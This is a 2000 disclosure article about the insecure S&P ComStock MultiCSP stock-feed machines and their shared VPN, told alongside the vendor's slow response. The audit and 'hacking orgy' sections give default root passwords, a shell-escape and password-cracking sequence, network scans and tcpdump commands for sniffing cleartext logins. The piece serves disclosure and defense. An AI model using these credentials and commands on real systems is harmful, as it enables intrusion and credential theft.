by Stephen J. Friedl, Network Consultant
Special to SecurityFocus.com
Summer 2000

Since at least December of 1999 — probably much longer — and until very recently, the Standard & Poor's (S&P) ComStock data network has allowed essentially unlimited access between the internal networks of unrelated subscribers. This is a security nightmare of enormous proportions, but even more unbelievable is how S&P utterly ignored repeated and persistent notification of this vulnerability.

This is the story of how two unrelated security consultants tried to get this addressed, and ultimately succeeded, but only with the aid of very full disclosure.

Background

The S&P ComStock division sells a "MultiCSP" client-side processor machine that provides quote and stock feeds to (at least) hundreds of subscribers in the US, and perhaps internationally. Their service aggregates information from more than 100 sources and sends it to subscribers, who in turn use the data for their own services.

Subscribers include stockbrokerages, news organizations, and major online companies. I was unable to find a vulnerable subscriber who would agree to be named for this story, but it's not hard to find plenty of web sites that identify S&P ComStock as the source of their news and quote feeds.

Data are provided via satellite, ISDN modem, or dedicated circuit (e.g., a T1), and the customer premises equipment is a small Linux appliance with connections to both the S&P and subscriber networks. The dedicated circuits (and perhaps the ISDN links) are part of a Virtual Private Network (VPN) provided by Concentric Networks, a major U.S. Internet provider. It's this "private" network that sits at the center of this story.

First Findings

In December 1999, Kevin Kadow of the security consultancy MSG.net reviewed one of these machines at a client site, and he found numerous problems. The machine itself was terribly insecure: root holes, unpassworded accounts, out-of-date operating system software, and generally no attention to security in any way. By itself this is a relatively minor matter, as these machines should sit deep inside a company's protected network, far from the prying eyes of internet users. But this is just the start of the problem.

MultiCSP machines linked via the VPN talk directly to S&P for their data feeds — of course — but appear to be able to talk to each other as well. This means that any one S&P subscriber can talk to any other S&P subscriber, and this arrangement opens the door for hacking and industrial espionage of unbelievable proportions.

Kevin recognized the importance of this problem and tried repeatedly to contact S&P, starting on 12 January 2000. He tried via email, phone, and fax, and got exactly one confused response from an S&P person who wondered how Kevin got his name (from the "spcomstock.com" InterNIC domain name registration). He later reported on BugTraq:

"At that point I was nearly frustrated enough to march into ComStock's downtown Chicago office with a printout of the exploit details and cracked passwords, in hopes of personally delivering them to the first corporate officer I could find." - Kevin Kadow

Nothing came of this, so on 1 February 2000 he made the first of what were to be several BugTraq postings on this topic. His posting was firm but a bit vague: he later told me that he didn't want to give away everything, leaving S&P yet another chance to clean things up.

Either because of this posting or of their own accord, S&P seems to have taken some minor steps to secure their machines. Several reports, including one from Kevin, claimed that machines shipped since roughly March of this year have closed some of the more glaring holes, but the fixes were mostly superficial. A moderately skilled Linux user would not have been slowed down for long.

He made an updated posting in March after he had access to a newer machine. At the time of these postings I had no access to, or interest in, the MultiCSP system, so I didn't give it much thought.

The Audit

In May, I was retained by a client to perform a network security audit and penetration test, and it turned out that he had one of these machines. This was not a focus of the test: I simply tripped across it during my analysis. The telnet login banner clearly identified the machine for what it was:

Red Hat Linux release 5.1 (Manhattan)
Kernel 2.0.35 on an i686

MCSP - Standard & Poor's ComStock - The McGraw-Hill Companies

Multiuser CSP Login:
<alt><F1> login: screen
<alt><F#> login: showusers
<alt><F#> login: showlog
<alt><F#> login: netconfig
<alt><F#> login: isdnconfig
<alt><F#> login: helpmcsp
<alt><F#> login: helpicl
login:

For somebody who'd read Kevin's BugTraq posting, this was an alarm call, but even absent that information it was an open invitation for hacking. Kevin had not posted the default passwords, but getting into this machine took remarkably little effort. The two "help" accounts had no passwords, and logging in with them simply brought up the "more" program on some large help files. A few simple shell escapes from more and vi yielded a user-level shell. The /etc/passwd file was not shadowed, so running the "Crack" program gave up root's password in very short order. The password was "c0mst0ck" (with zeros in place of the ohs).
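
For illustration, the whole sequence went roughly like the following. This is a reconstruction rather than a literal transcript, and it assumes Alec Muffett's classic Crack; the exact more/vi escape and the cracker invocation vary a bit by version.

login: helpmcsp                    (account has no password; "more" displays a large help file)
--More--!sh                        ("!" escapes from more into an unprivileged shell)
$ cat /etc/passwd                  (not shadowed, so the password hashes are right here)
$ exit

  ... then, back on the consultant's own machine ...

$ ./Crack passwd.copy              (dictionary attack against the captured password file)
$ ./Reporter -quiet                (root's "c0mst0ck" falls out in short order)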

I found the machine exactly as Kevin described: full of holes, and configured without regard for security. The operating system was out of date, but I understand that this was simply an older installation and that newer ones didn't have the neon "hack me" sign.

It appeared to be an out-of-the-box Red Hat Linux 5.1 installation, and this would explain many of the unnecessary services that were found running by default. But Samba, the daemon that emulates a Windows NT file server, was actively configured for each machine. The domain and machine name were set in the smb.conf file, though it's not at all clear that this is actually used in any production way. No shares were exported, and the Samba logfiles showed no activity of any kind.

Why they took the trouble to configure a service that apparently goes unused remains a mystery, but having Samba around turned out to be helpful in the adventure that followed.
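
Confirming that Samba was configured but idle takes only a couple of commands on the box itself, something along these lines. The smb.conf values shown are illustrative (patterned on the NetBIOS names that turn up in the scan below), and the log location is a guess:

# grep -E -i "workgroup|netbios name" /etc/smb.conf
   workgroup = MYGROUP
   netbios name = CV55612
# smbclient -N -L localhost          # list exported shares without a password: there are none
# ls -l /var/log/samba               # or wherever smb.conf points its logs: empty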

Going on Walkabout

Kevin's original posting made some fuzzy references to the private network, and sure enough, this machine was on it. The 172.23.x.x network lies in IANA-reserved private (RFC 1918) class B space, which suggested a very large range of addresses that might be in use by S&P subscribers. I downloaded some of my investigation tools and found this to be the case.

Since Samba was running on all the MultiCSP machines, my NetBIOS scanner (nbtscan) was able to recognize them very quickly. I did scans of only a few limited subnets, but in retrospect I should have just scanned the entire class B space. At the time I wasn't sure how much of my activity would be detected: it turns out I needn't have worried.

#  nbtscan 172.23.0.0/16 

172.23.x.y    MYGROUP\CV55612            SHARING
172.23.x.y    MYGROUP\CV55765            SHARING
172.23.x.y    MYGROUP\CV54462            SHARING
172.23.x.y    MYGROUP\CV55225            SHARING
172.23.x.y    MYGROUP\CV55430            SHARING
172.23.x.y    MYGROUP\CV55431            SHARING
172.23.x.y    MYGROUP\CV55643            SHARING
172.23.x.y    MYGROUP\CV55642            SHARING
172.23.x.y    MYGROUP\CV55602            SHARING
172.23.x.y    MYGROUP\CV55625            SHARING
172.23.x.y    MYGROUP\CV60666            SHARING
172.23.x.y    MYGROUP\55209              SHARING
172.23.x.y    MYGROUP\CV54822            SHARING
172.23.x.y    MYGROUP\CV54457            SHARING
172.23.x.y    MYGROUP\CV55918            SHARING
172.23.x.y    MYGROUP\CV55900            SHARING
172.23.x.y    MYGROUP\CV54585            SHARING
172.23.x.y    MYGROUP\CV55962            SHARING
172.23.x.y    MYGROUP\CV55903            SHARING
172.23.x.y    MYGROUP\CV55902            SHARING

Each of these is a MultiCSP machine, and this is just a small number of machines in a few limited subnets. I expect that a full class B scan would have found at least a hundred of them. I also believe that the number after "CV" is the S&P installation number: if you have one of these machines, you might have had a visitor recently.

I tested the machines listed here and found that many of them permitted login via the shell escapes and the default "c0mst0ck" root password. Not all of the machines showed the same full login banner or permitted an immediate login; these were likely newer machines with different default passwords. Kevin later reported on BugTraq that the default password for these newer machines was "abcd1234", and from there it was just a minor step to root compromise. I'm confident that many of these machines could have been "owned" as well.

Once on one of these remote MultiCSP machines as root, the ifconfig command revealed that the non-VPN Ethernet card was on the subscriber's private network, with 10.x.x.x or 192.168.x.x addresses. Though it's possible that some subscribers had properly firewalled these S&P systems (as described later), it's hard to believe that all of them had. My client had not secured his.
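
Schematically, the view from a freshly compromised remote box looked like this; the addresses and interface names are illustrative, and the ifconfig output is heavily abbreviated:

# telnet 172.23.x.y                  (any MultiCSP turned up by the scan; same login dance as before)
  ...
# ifconfig
eth0   inet addr:172.23.x.y   ...    (the "private" S&P/Concentric VPN)
eth1   inet addr:192.168.1.2  ...    (the subscriber's own internal network)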

I was positively stunned by this: having root access on a Linux machine inside a "victim" network is an attack launchpad surpassed only by physical access to the facility and a gun to the sysadmin.

I didn't spend any time going beyond the MultiCSP machines on the subscriber networks themselves. I was certainly curious (of course), but there was simply no ethical justification for this intrusion: the fact that I could get to the subscriber's MultiCSP was evidence enough of the problem, and going beyond this would have been gratuitous.

We also found some odd behavior with respect to just how "private" the VPN really is, as we saw clear evidence of private-address packets leaving the VPN and making it to the public internet. This strikes both of us as undesirable, but in fact neither Kevin nor I have any real knowledge of how this VPN is supposed to work. We don't know what kind of contract S&P has with Concentric, what kind of topology was designed, who is responsible for which parts, or whether S&P even has Concentric's managed secure VPN product in the first place. They're not talking to me about any of this, so it seems inappropriate for me to speculate too strongly on whether this is wrong, unexpected, or even unintended. This is one of those things that I'll never know.
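
For what it's worth, this sort of leakage is easy to watch for from any internet-facing host well outside the VPN. A filter along these lines (the interface name is an assumption) should never print a single packet if the private addressing really stays private:

# tcpdump -n -i eth0 net 172.23.0.0 mask 255.255.0.0    # should stay silent forever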

In any case, clearly Kevin had substantially understated — deliberately, it turned out — the impact of this problem, and there is simply no way that all these S&P subscribers were aware of the Trojan Horse in their midst. I was determined to get this fixed.

A close colleague works in the financial services industry, and he has many more contacts than I do; I sent him a long technical note on the dangers of these machines as a heads-up for his security people. On 9 May 2000, he left a voicemail and an email for David Brukman, the VP of Technology at S&P in New York. The email was:

Date: Tue, 9 May 2000 17:07:57 -0700 (PDT)
From: {colleague}
to: david_brukman@standardandpoors.com
cc: Stephen Friedl 
Subject: [steve@unixwiz.net: S&P ComStock stock-feed machines]

David, this is the note I mentioned in my voicemail. {Company} has
a number of these machines, so I'll be forwarding this note along
to our security people. If they need to contact someone at S&P,
whom should they talk to?

[Attached: my long detailed note]

He also contacted his San Francisco S&P representative by phone and email with instructions to run it up his flagpole, but we heard nothing from anybody. A week later I went public with my BugTraq posting entitled "Standard and Poors Security Nightmare". This was on Wednesday, 17 May 2000.

I got numerous responses from other BugTraq readers, including people who had seen essentially the same thing. During this week I made some minor but utterly unsuccessful attempts at garnering media attention, so I decided to just let it go.

On Tuesday, 23 May, a kind BugTraq reader forwarded a note he had received from S&P on the security issue. They didn't really address the VPN problem, but it was clear from the note that they were taking the issue seriously and taking exactly the right steps to secure the boxes themselves. This was very gratifying, and I thought this would be the end of it.

An hour later I got a phone call from Paul Festa, a reporter from CNet. He had read my BugTraq posting and wanted clarification. I was of course happy to talk to him, and during the conversation it became clear that S&P believed that since the VPN was secure, the security of the box itself was not terribly critical.

This is an important point, and one S&P is fully correct on. If the VPN does not allow one subscriber endpoint to talk to another, it doesn't matter much whether the box is wide open or not because access from "outside" the trusted zone simply is not permitted. I believe S&P was (and perhaps still is) mistaken in their belief that the VPN is secure in that way.

Mr. Festa and I had several phone calls and emails on this subject, and a bit later an email from him said that David Brukman would be contacting me later in the day. It would be the first contact of any kind I'd have from S&P.

He did call, but as I was still under nondisclosure with my client, I had to be vague with him on some of the details of my adventures so as not to identify who had hired me. My client had not yet quite secured his own network, and he asked that I keep this private for now.

I had the impression that Mr. Brukman was not convinced that I could do what I did, so I gave him the IP address (on the VPN) of one machine I knew was open to this attack from other parts of the S&P network. I also sent him the source code to the nbtscan tool I had used to scan the network, and shortly thereafter he sent a polite thank-you via email saying he would pass this along to his engineers for investigation.

During the call Mr. Brukman offered that my speculation about where I'd been — the Netherlands and Singapore — was not correct, as they don't offer VPN services in those areas. I had gone enormously out on a limb with these weak speculations given the extremely limited information available, and I'm glad he corrected the record. I suspect that my walkabout was limited to the United States.

At around the same time I got an email query from Elizabeth Coolbaugh at Linux Weekly News. At the time I thought it was related to the CNet research, but they were parallel unrelated inquiries.

Let the Spin Begin

The next morning (Wednesday, 24 May) the CNet story hit the news, and in it Mr. Brukman is quoted as saying:

"If customers can reach from one endpoint to another, it's a concern," said David Brukman, vice president of technology for S&P's ComStock. "That would be a Concentric concern.... It's possible they have made a mistake and let one customer see another."

Clearly he understands that endpoint-to-endpoint connectivity would be a problem, but then seeks to blame Concentric for it. My hunch is that this is also S&P's fault, but (as mentioned before) I simply don't know enough to make a real judgment.

Later Wednesday evening, the story was covered by Linux Weekly News, whose article focused more on S&P's response than on the security issue itself.

On Thursday, 25 May, Mr. Brukman contacted my client to ask about "security breaches" from his MultiCSP machine. Either with the information I had provided or by their own research, they had found where the "attacks" had come from. S&P had identified several machines and time frames that all corresponded with my activities, so after consulting with me, my client confirmed that this was part of an authorized network audit.

Later that day (Thursday) I got a call from Jaikumar Vijayan of Computerworld on this same story. As with the CNet reporter, we corresponded several times, and in all cases I urged the reporter to talk with Kevin Kadow also: he could independently confirm much of what I'd found. Kevin and I have no relationship other than a casual one that has developed over this story.

As an amusing aside, I submitted a written report to my client at about the time of the BugTraq posting, and it included recommended steps to secure the MultiCSP machine. Some time later, I got paged by my client's sysadmin who had received my audit report: he reported that he couldn't get into his MultiCSP via the root account. It turned out that a different sysadmin, one who wasn't aware of the audit, saw the BugTraq posting and was securing the machine at the same time: he'd just changed the root password independently. He was surprised to learn that the network being described on BugTraq was his network, and the two admins then took steps to secure the machine together.

S&P contacted my client on Thursday and was "concerned" about the client having made those "unauthorized changes" to the system, which is S&P property. Apparently they could not get into the machine any longer. My client explained that it was simply a defensive maneuver in response to the BugTraq posting.

I have the impression that S&P was making these changes on a systematic basis across their subscriber base, and my client reports that S&P support has really been very proactive on this front. I welcome this wholeheartedly, although it's long overdue.

My client also released me from nondisclosure with respect to S&P, so on Friday 26 May I sent Mr. Brukman a very long email that detailed all of my actions and findings, including IP addresses seen and steps taken. He had commented to my client that I'd been evasive on the phone earlier in the week, and with the NDA release I could now clear the air. I was being very tough on S&P in the press, but it would serve no purpose to keep them in the dark about my activities.

On Friday afternoon, the Computerworld article hit their web site, and in it Mr. Brukman is quoted as saying:

"It is possible that at some point in the past, the consultant may have found some flaw in the network, but the latest audit indicates the network is secure."

My most recent "walkabout" had been on or about 15 May, so these vulnerabilities were still present in the very recent past, and S&P had been notified of them at least five months earlier.

I believe that S&P is simply "spinning" this to the press to cast doubt on the reports of an unknown consultant, and in the face of the news coverage they were getting, I'm not sure that I fault them for it. Who knows what kind of liability they were looking at?

A Potential Hacking Orgy

Kevin and I are ethical security consultants, and as such we were very careful as to what we did on remote S&P subscriber machines: working independently, we gathered just enough information to be sure of what we saw without actually hurting anything. But the potential for abuse was simply enormous.

Access to this machine could be likened to showing up inside the secure area of a secret government building. Normally the only people in this area are those who have passed several security checkpoints, so if you're there, it's assumed you belong there. Doors typically aren't locked on this floor, because all the users are trusted.

The MultiCSP machine provides exactly this kind of platform. From this compromised system it is an easy matter to download the usual scanning toolkits, and nmap by Fyodor (http://www.insecure.org) is one of the first choices. This is the premier network scanning tool for Linux, and it allows a user to gather extensive information on the local network: which machines are visible and what operating systems they run.
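
A typical first pass might look something like this; the flags are standard nmap options, and the target networks are illustrative:

# nmap -sS -O 192.168.1.0/24         # SYN-scan the subscriber LAN and fingerprint each OS
# nmap -sS -p 1-1024 172.23.0.0/16   # or sweep the S&P VPN itself for listening services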

It's also easy to run a network sniffer to quietly collect passwords as they travel over the local Ethernet, and "interesting" ones will turn up eventually. These include UNIX telnet logins, Windows NT login passwords, database passwords, and even router/firewall passwords now and then. Patience is rewarded on this front.
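
Even plain tcpdump is enough for this. A passive capture along the following lines (the interface and filename are illustrative) can be left running for days and picked over at leisure:

# tcpdump -n -i eth0 -s 1500 -w logins.pcap port 23 or port 21 or port 110
# strings logins.pcap | less         # crude, but telnet, FTP, and POP logins are all in there in cleartext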

It's just a matter of time before the intruder has a very detailed "map" of the local network, including passwords to nearly everything. From there he can take what he likes. Client software for most major databases (DB2, Oracle, and others) is available for Linux, so making a surreptitious connection to the company's internal database would yield all the data found within: this might even include credit card numbers, one of the holy grails of the cracker community.

It is hard to place any real limits on what could be done from this launching point inside the subscriber's network. Even if one subscriber detects the bad guy and secures the machine, there are still perhaps dozens of other, unrelated subscribers who remain open to the same attack via the S&P VPN.

What I didn't explore, and what Kevin probably didn't either, is just what could be done to the S&P machines themselves. It is not out of the question that the "source" machine for the quote/news data could be compromised and shenanigans played with the data fed to all subscribers. Perhaps stock quotes could be altered? I don't think this is likely, because even though S&P believed that VPN endpoints were secure, it's hard to believe that they didn't harden their own servers from their own subscribers. But it's a question to be asked.

Normally these machines are accessible only to S&P subscribers, so at first it seems that the only exposure is to their staff. Though these companies are typically competitors, there are limits to what even an aggressive competitor will do to another, even given the chance. The larger point is that the entire S&P subscriber base was only as secure as its least secure member. It would not be out of the question for a smaller — and probably less well armored — subscriber to be targeted by an attacker simply for access to the S&P network. From there it would be a free-for-all of information gathering.

What S&P Did Wrong

Everybody makes mistakes, but the real measure is how one responds to a mistake once it's discovered or pointed out. The initial oversight of deploying an insecure network is not really worthy of the beating that S&P is taking in the press, but ignoring repeated and persistent reports of the problem does make it warranted. I see several failings, each discussed in turn.

1. They deployed a grossly insecure Linux machine

This is the one that S&P has been forthcoming on: assuming the VPN is secure, the security of the end-user machine is not terribly important. In this I fully agree with S&P. I'd still have preferred that the machines be secure from casual passers-by, which would cut down on poking around by curious subscriber staff. But this is not a terribly big deal by itself.

2. They deployed a VPN that provided endpoint-to-endpoint connectivity

It is clear to me that the VPN permitted walkabout all over their network, and this is an enormous hole. I believe that S&P simply didn't give this matter a thought and assumed that either Concentric was somehow handling it or that nobody else would notice. It turns out they chose poorly.

3. They apparently failed to perform any audit

This follows from #2 — if they didn't set it up securely, they obviously didn't check it after the fact. Good security practices dictate regular audits to make sure that things don't slip through the cracks. It turns out that they did get an audit, but it was done by their customer. Ouch.

4. There doesn't seem to be any evidence of an IDS (Intrusion Detection System) on the network

Kevin and I, and probably others, performed numerous very noisy scans of the 172.23.*.* address space, and it's not clear that anybody noticed. During the walkabout of the network we noticed Bay Networks routers (presumably owned by Concentric), plus I have seen the output of a full nmap scan of the entire class B network. Nmap is as subtle as a tornado, and it's hard to believe that nobody noticed this. Unbelievable.

5. They ignored repeated notifications, even at the highest level

In my view, this is by far the most critical failure. It's easy enough to make a mistake of omission, and even the best security consultants drop the ball now and then. But to ignore repeated reports of an enormous security hole, whether out of ignorance, disbelief, or a desire for the problem to just go away, is foolish.

Starting in at least January, they were notified numerous times of this problem and took no apparent action other than to slightly shore up the security of the MultiCSP machines. These actions were minimal and didn't contribute much to any real security. I don't know whether they were related to Kevin's BugTraq activity or his notifications.

The BugTraq postings in February and March were a clear wake-up call to S&P, and I have it from a reliable source that Mr. Brukman was notified personally during this time frame. As far as any of us can tell, no action was taken.

David Brukman was again notified by phone and by email in May by my close colleague, and (again) nothing happened as far as I can see. It's hard to imagine getting more blown off than this. All of us made substantial efforts to report this before going public. It's only fair.

Mr. Brukman's response to the press has been to deny that this is a problem and then to blame Concentric for it. I have enough experience with security consulting to dismiss his dismissals out of hand: I know what I saw. My claims have always been based on tests that could easily be reproduced, either from S&P's network control center or by any S&P subscriber. This story is just too easy to check to be dismissed so easily.

It's always possible that Kevin's early reports went to low-level staffers who simply didn't understand the issues, though I believe that anybody in the financial services industry should have immediately tuned in to the security warning and found somebody appropriate to investigate.

I believe that this failure was a team effort on the part of S&P. The combination of bad actions (terrible security) and bad inactions (totally ignoring reports from all angles) contributed to the miserable security situation and the bad PR they're getting lately.

We'll probably never hear the S&P side of the story, but I believe actions — and inactions — largely speak for themselves.

Protecting yourself

In the last two weeks, S&P has made substantial efforts to secure these machines, but I have no reports of any action taken on the VPN front. I have lost all access to the MultiCSP machine and cannot perform additional tests, but even if it has been secured, how long will that last? Are we confident that S&P will stay on top of this forever?

I wouldn't bet the farm against a repeat of the past, so I have recommended to my client that he firewall the unit off from the rest of his network. This machine is simply not to be trusted, and installing a small firewall router between the MultiCSP unit and his network drastically reduces the opportunities for penetration.

I believe that the MultiCSP is listening on just a few TCP ports and that it need not ever "reach out" to the subscriber network on its own. This being the case, an inexpensive Netopia R9100 Ethernet-to-Ethernet router can sit between the two devices and treat the MultiCSP as "on the outside". These cost less than $500 "on the street", and they are a breeze to configure.

Disclaimer — I don't sell hardware or software: I'm just a very happy Netopia customer.

With the Network Address Translation (NAT) facilities configured, there is only a one-way path from the subscriber network to the MultiCSP, and even a fully root-compromised MultiCSP machine simply won't see anything on the subscriber network. This low-cost arrangement means that you're not trusting S&P for anything other than the news/quote data itself.
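
I won't reproduce the Netopia's configuration here, but the same one-way design can be sketched in generic Linux terms as a small 2.2-kernel box doing IP masquerading between the two networks. The interface roles and the 192.168.1.0/24 subscriber network are assumptions for the example:

# echo 1 > /proc/sys/net/ipv4/ip_forward          # let the box route between the two networks
# ipchains -P forward DENY                        # by default, forward nothing at all
# ipchains -A forward -s 192.168.1.0/24 -j MASQ   # masquerade only traffic initiated from the inside

The MultiCSP sees nothing but the firewall's own address; connections it tries to initiate toward the subscriber LAN match no rule and are dropped, while replies to sessions started from the inside ride back through the masquerade table.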

Conclusions

It is my firm belief that S&P acted on this only because of the full-disclosure posting to BugTraq. Kevin Kadow, who saw essentially the same thing that I did, posted a watered-down account of the dangers in the hope of getting S&P's attention without handing the bad guys a road map for hacking the S&P network. It's not clear that it had any meaningful effect.

Before my posting, I had quietly asked others in the security community for advice on whether I should post the actual passwords and the literal steps of the break-in. The consensus was that since Kevin had broken ground on this previously and S&P was apparently not interested in the matter, a wake-up call was in order. I was told more than once to "roast 'em".

S&P went into high gear shortly after my BugTraq posting hit the list. It's not clear to us whether they were responding to the posting itself, press queries about it, or subscriber questions/complaints. I'll probably never know for sure, but the timeline gives a clue.

The BugTraq posting was released on 17 May, and Linux Weekly News asked S&P for a comment shortly thereafter. CNet reporter Paul Festa started poking around on this story (I believe) early in the week of 22 May, and on 24 May S&P sent a security letter to their subscriber base. The S&P letter came before I was aware of any press activity.

The S&P security letter was so perfectly on target that I find it hard to believe it was put together in haste in a single day. This suggests that it had been in the works since (at least) the week before, and that the CNet queries were not the catalyst for their action. My hunch is that the BugTraq posting was the key, and that perhaps seeing their root passwords posted on the Internet got their attention.

I continue to support full disclosure with vendor pre-notification. A responsible vendor will act on the advisory and be grateful for a good report and the opportunity to address it. I got neither of these from S&P, so going public in a vocal way was the last resort, and it seems to have been effective.